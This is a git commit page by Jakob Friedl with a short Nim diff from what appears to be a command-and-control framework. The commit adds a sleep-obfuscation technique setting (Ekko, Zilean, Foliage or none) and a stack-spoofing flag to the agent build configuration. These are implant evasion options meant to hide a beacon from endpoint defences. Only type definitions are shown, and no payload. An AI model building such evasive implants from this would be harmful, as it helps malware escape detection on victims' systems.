Integrated sleep obfuscation settings into agent generation.

This commit is contained in:
Jakob Friedl
2025-09-04 13:44:50 +02:00
parent e297bb2d76
commit e64e31a7bc
8 changed files with 39 additions and 24 deletions

View File

@@ -77,10 +77,11 @@ type
LOG_SUCCESS = "[DONE] "
LOG_WARNING = "[WARN] "
SleepObfuscationMode* = enum
EKKO = 0'u8
ZILEAN = 1'u8
FOLIAGE = 2'u8
SleepObfuscationTechnique* = enum
NONE = 0'u8
EKKO = 1'u8
ZILEAN = 2'u8
FOLIAGE = 3'u8
# Encryption
type
@@ -209,6 +210,8 @@ type
ip*: string
port*: int
sleep*: int
sleepTechnique*: SleepObfuscationTechnique
spoofStack*: bool
sessionKey*: Key
agentPublicKey*: Key
profile*: Profile